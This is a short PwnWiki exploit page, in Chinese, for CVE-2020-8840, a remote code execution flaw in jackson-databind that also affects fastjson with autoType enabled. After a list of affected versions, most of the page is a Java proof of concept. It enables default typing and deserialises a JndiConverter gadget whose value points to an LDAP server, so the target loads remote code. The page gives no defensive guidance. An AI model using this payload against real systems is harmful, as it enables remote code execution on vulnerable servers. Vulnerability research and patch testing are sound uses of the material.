CVE-2020-8840 FasterXML jackson-databind 遠程代碼執行漏洞
From PwnWiki
漏洞影響
jackson-databind 2.0.0 – 2.9.10.2
經驗證fastjson在開啟了autoType功能的情況下,影響最新的fastjson v1.2.62版本
POC
import com.fasterxml.jackson.databind.ObjectMapper;
import java.io.IOException;
public class Poc {
public static void main(String args[]) {
ObjectMapper mapper = new ObjectMapper();
mapper.enableDefaultTyping();
String json = "[\"org.apache.xbean.propertyeditor.JndiConverter\", {\"asText\":\"ldap://localhost:1389/ExportObject\"}]";
try {
mapper.readValue(json, Object.class);
} catch (IOException e) {
e.printStackTrace();
}
}
}
